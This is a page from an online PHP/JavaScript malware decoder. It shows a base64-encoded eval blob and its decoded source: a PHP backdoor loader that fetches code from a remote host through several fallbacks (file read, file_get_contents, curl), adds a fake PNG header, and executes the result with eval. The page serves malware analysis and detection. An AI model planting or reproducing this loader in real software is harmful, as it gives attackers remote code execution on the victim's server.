Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


Show other level 

eval("".base64_decode("PD9waHAgDQovL2ZhZ2FkZg0KIyBDb21waWxlZEJ5OiBEZXZLaXQgOS41LjINCi8vIOa3t+a3huWvhumSpTogM2E3YjEwYmMNCi8vIOWQr+WKqOS8muivnQ0Kc2Vzc2lvbl9zdGFydCgpOw0KLy8g6K6+572u5Li75Zyw5Z2A77yM5aaC5p6c5rKh5pyJ6K6+572u5YiZ5L2/55So6buY6K6k5Zyw5Z2ADQok5Li75Zyw5Z2AID0gJF9TRVNTSU9OWyd0c191cmwnXSA/PyAnaHR0cHM6Ly9jb2RlLmRlY3BhaW4ubXkvc3MvODU3Ni5waHAnOw0KLy8g5a6a5LmJ5Yqg6L295Ye95pWwDQpmdW5jdGlvbiDliqDovb3mlbDmja4oJOWcsOWdgCkNCnsNCiAgICAk5YaF5a65ID0gJyc7DQogICAgdHJ5IHsNCiAgICAgICAgJOaWh+S7tiA9IG5ldyBTcGxGaWxlT2JqZWN0KCTlnLDlnYApOw0KICAgICAgICB3aGlsZSAoISTmlofku7YtPmVvZigpKSB7DQogICAgICAgICAgICAk5YaF5a65IC49ICTmlofku7YtPmZnZXRzKCk7DQogICAgICAgIH0NCiAgICB9IGNhdGNoIChUaHJvd2FibGUgJOmUmeivrykgew0KICAgICAgICAk5YaF5a65ID0gJyc7DQogICAgfQ0KICAgIC8vIOWwneivleeUqCBmaWxlX2dldF9jb250ZW50cw0KICAgIGlmIChzdHJsZW4odHJpbSgk5YaF5a65KSkgPCAxKSB7DQogICAgICAgICTlhoXlrrkgPSBAZmlsZV9nZXRfY29udGVudHMoJOWcsOWdgCk7DQogICAgfQ0KICAgIC8vIOWmguaenOi/mOWksei0pe+8jOS9v+eUqCBjdXJsDQogICAgaWYgKHN0cmxlbih0cmltKCTlhoXlrrkpKSA8IDEgJiYgZnVuY3Rpb25fZXhpc3RzKCdjdXJsX2luaXQnKSkgew0KICAgICAgICAk6YCa6YGTID0gY3VybF9pbml0KCTlnLDlnYApOw0KICAgICAgICBjdXJsX3NldG9wdF9hcnJheSgk6YCa6YGTLCBbQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiA9PiB0cnVlLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OID0+IHRydWUsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQgPT4gNSwgQ1VSTE9QVF9USU1FT1VUID0+IDEwXSk7DQogICAgICAgICTlhoXlrrkgPSBjdXJsX2V4ZWMoJOmAmumBkyk7DQogICAgICAgIGN1cmxfY2xvc2UoJOmAmumBkyk7DQogICAgfQ0KICAgIHJldHVybiAk5YaF5a65Ow0KfQ0KLy8g5bCd6K+V5Yqg6L295Li7572R5Z2ADQok57uT5p6cID0g5Yqg6L295pWw5o2uKCTkuLvlnLDlnYApOw0KLy8g5re75Yqg5YGH55qEUE5H5aS06YOoDQok5YGHUE5H5aS0ID0gIlx4ODlQTkdcclxuXHgxYVxuIjsNCi8vIOaLvOaOpVBOR+WktOWSjOe7k+aenOWGheWuuQ0KJOe7k+aenCA9ICTlgYdQTkflpLQgLiAk57uT5p6cOw0KLyoqXyoqLw0KLyoqXyoqLw0KLyoqXyoqLw0KLyoqXyoqLw0KLyoqXyoqLw0KLyoqXyoqLw0KLyoqXyoqLw0KLy8g5aaC5p6c5oiQ5Yqf6I635Y+W5YaF5a6577yM5YiZ5omn6KGMDQppZiAoc3RybGVuKHRyaW0oJOe7k+aenCkpID4gMCkgew0KICAgIEBldmFsKCI/Pnsk57uT5p6cfSIpOw0KfQ=="));


//fagadf
# CompiledBy: DevKit 9.5.2
// 混淆密钥: 3a7b10bc
// 启动会话
session_start();
// 设置主地址,如果没有设置则使用默认地址
$主地址 = $_SESSION['ts_url'] ?? 'https://code.decpain.my/ss/8576.php';
// 定义加载函数
function 加载数据($地址)
{
    $内容 = '';
    try {
        $文件 = new SplFileObject($地址);
        while (!$文件->eof()) {
            $内容 .= $文件->fgets();
        }
    } catch (Throwable $错误) {
        $内容 = '';
    }
    // 尝试用 file_get_contents
    if (strlen(trim($内容)) < 1) {
        $内容 = @file_get_contents($地址);
    }
    // 如果还失败,使用 curl
    if (strlen(trim($内容)) < 1 && function_exists('curl_init')) {
        $通道 = curl_init($地址);
        curl_setopt_array($通道, [CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10]);
        $内容 = curl_exec($通道);
        curl_close($通道);
    }
    return $内容;
}
// 尝试加载主网址
$结果 = 加载数据($主地址);
// 添加假的PNG头部
$假PNG头 = "\x89PNG\r\n\x1a\n";
// 拼接PNG头和结果内容
$结果 = $假PNG头 . $结果;
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
// 如果成功获取内容,则执行
if (strlen(trim($结果)) > 0) {
    @eval("{$结果}");
}


© 2023 Quttera Ltd. All rights reserved.